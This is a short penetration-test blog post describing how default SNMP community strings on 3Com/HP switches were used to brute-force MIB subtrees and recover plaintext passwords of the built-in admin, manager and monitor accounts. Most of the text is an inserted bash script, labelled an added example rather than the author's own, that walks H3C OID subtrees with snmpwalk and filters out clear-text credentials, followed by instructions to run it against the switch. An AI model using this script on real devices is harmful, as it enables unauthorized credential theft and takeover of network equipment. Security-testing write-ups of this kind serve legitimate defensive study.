During one of our internal network penetration tests, I focused on the network devices. The customer had 3Com/HP switches. A quick port scan with Nmap NSE scripts revealed that the switches used default SNMP community strings (private)! I looked into known SNMP problems affecting 3Com/HP switches; there was a really interesting issue:
I tried querying all the OIDs from the hh3c-user.mib file, with no success.
After everything else had failed, the solution was good old brute force (snmpwalk driven by a shell script):
The screenshot shows the three default accounts on the device (admin, manager and monitor) and their plaintext passwords.
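The original script is not reproduced on this page, so here is an added example of what such an snmpwalk brute force looks like (my own code, not the author's). It walks the numbered child subtrees under a base OID one at a time, keeps only the subtrees that actually answer, and then filters for octet-string values, which is where user names and clear-text passwords surface on devices like these. It assumes net-snmp's snmpwalk on the PATH, an SNMPv2c target, and uses the H3C enterprise OID .1.3.6.1.4.1.25506 only as an example starting point; the host, community and child range are arguments you supply.

```shell
#!/usr/bin/env bash
# Added example, not the post author's script.
# Assumptions: net-snmp snmpwalk is installed; the target speaks SNMPv2c.
# SNMPWALK is overridable so the script can be exercised without a live switch.
SNMPWALK="${SNMPWALK:-snmpwalk}"

# Walk BASE.1 .. BASE.MAX and print the output of every subtree that returns data.
#   $1 host, $2 community string, $3 numeric base OID, $4 highest child index to try
walk_children() {
    local host="$1" community="$2" base="$3" max="$4" i out
    for i in $(seq 1 "$max"); do
        # -On: numeric OIDs, -Oa: print octet strings as ASCII,
        # -t 1 -r 1: one-second timeout with a single retry so the sweep stays fast
        out=$("$SNMPWALK" -v2c -c "$community" -On -Oa -t 1 -r 1 "$host" "$base.$i" 2>/dev/null) || true
        case "$out" in
            ""|*"No Such Object"*|*"No Such Instance"*|*"No more variables"*) continue ;;
        esac
        printf '%s\n' "$out"
    done
}

# Reduce walked output to non-empty octet-string values (user names, passwords,
# file names); integers, counters and OIDs are dropped.
strings_only() {
    grep -E '= STRING: ' | grep -vE '= STRING: ""$'
}

# Usage: ./mibbrute.sh <host> <community> [base-oid] [max-child]
# Example base OID: the H3C enterprise subtree .1.3.6.1.4.1.25506 (assumed here).
if [ "$#" -ge 2 ]; then
    walk_children "$1" "$2" "${3:-.1.3.6.1.4.1.25506}" "${4:-200}" | strings_only
fi
```

Run it against the switch with the community string the scan turned up; widen the child range if the subtree you care about sits deeper than the default, and pipe the output to a file, since the interesting values are often buried among hundreds of legitimate strings.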
The SNMP MIB brute force revealed other interesting information too, including configuration files that could be downloaded over TFTP ;)
What have we learnt today? If a method of attack does not work at first, do not reject it immediately!